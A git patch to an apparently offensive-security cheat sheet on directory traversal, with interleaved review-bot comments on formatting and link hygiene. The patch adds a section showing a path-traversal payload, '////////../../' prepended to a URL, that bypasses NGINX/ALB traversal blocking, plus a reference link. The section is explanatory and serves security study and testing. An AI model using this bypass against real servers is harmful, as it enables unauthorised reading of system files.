From e8744406f98155c0ebb0a80e50ac6f6496f4d0cf Mon Sep 17 00:00:00 2001
From: irotem <rotemb@gmail.com>
Date: Sun, 4 Oct 2020 12:42:51 +0300
Subject: [PATCH] Added traversal bypass of nginx/alb

---
 Directory Traversal/README.md | 10 ++++++++++
 1 file changed, 10 insertions(+)

diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md
index 3993305..1f316a3 100644
--- a/Directory Traversal/README.md	
+++ b/Directory Traversal/README.md	
@@ -12,6 +12,7 @@
     * [Bypass "../" with ";"](#bypass--with-)
     * [Double URL encoding](#double-url-encoding)
     * [UNC Bypass](#unc-bypass)
+    * [NGINX/ALB Bypass](#nginxalb-bypass)
 * [Path Traversal](#path-traversal)
     * [Interesting Linux files](#interesting-linux-files)
     * [Interesting Windows files](#interesting-windows-files)
@@ -89,6 +90,14 @@ An attacker can inject a Windows UNC share ('\\UNC\share\name') into a software
 \\localhost\c$\windows\win.ini
 ```
 
+### NGINX/ALB Bypass
+
+NGINX in certain configurations and ALB can block traversal attacks in the route, For example:
+```http://nginx-server/../../``` will return a 400 bad request.
+
+To bypass this behaviour just add forward slashes in front of the url:
+```http://nginx-server////////../../```
+
 
 ## Path Traversal
 
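Review bot: The two added URL lines in this hunk are wrapped in triple backticks on a single line (```http://nginx-server/../../``` and ```http://nginx-server////////../../```), which most renderers treat as inline code, while the rest of this README puts such examples in fenced blocks (see the ``` closing the UNC example just above in the same hunk); please move both URLs into fenced blocks so the section matches its neighbours. The prose also needs a small clean-up: "in the route, For example:" has a capital after a comma, "400 bad request" should be "400 Bad Request", and "url" should be "URL". Finally, the section states that NGINX "in certain configurations" and ALB return 400 but does not say which configurations, nor why the extra leading slashes change the outcome; a sentence on when this applies (the linked article added in the references hunk would be the natural source) would help readers judge whether their deployment is affected. Also note the added blank line at the end of the section sits next to an existing blank line, leaving two empty lines before "## Path Traversal".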
@@ -178,3 +187,4 @@ The following log files are controllable and can be included with an evil payloa
 * [Path Traversal Cheat Sheet: Windows](https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/)
 * [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack)
 * [CWE-40: Path Traversal: '\\UNC\share\name\' (Windows UNC Share) - CWE Mitre - December 27, 2018](https://cwe.mitre.org/data/definitions/40.html)
+* [NGINX may be protecting your applications from traversal attacks without you even knowing](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d?source=friends_link&sk=e9ddbadd61576f941be97e111e953381)
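Review bot: The new reference URL carries Medium's `?source=friends_link&sk=...` share parameters, which are a per-share tracking token rather than part of the article's canonical address; please link the bare article URL instead. The other entries in this list also carry a source and date in the link text (e.g. "CWE Mitre - December 27, 2018"), so the added entry should follow that format for consistency.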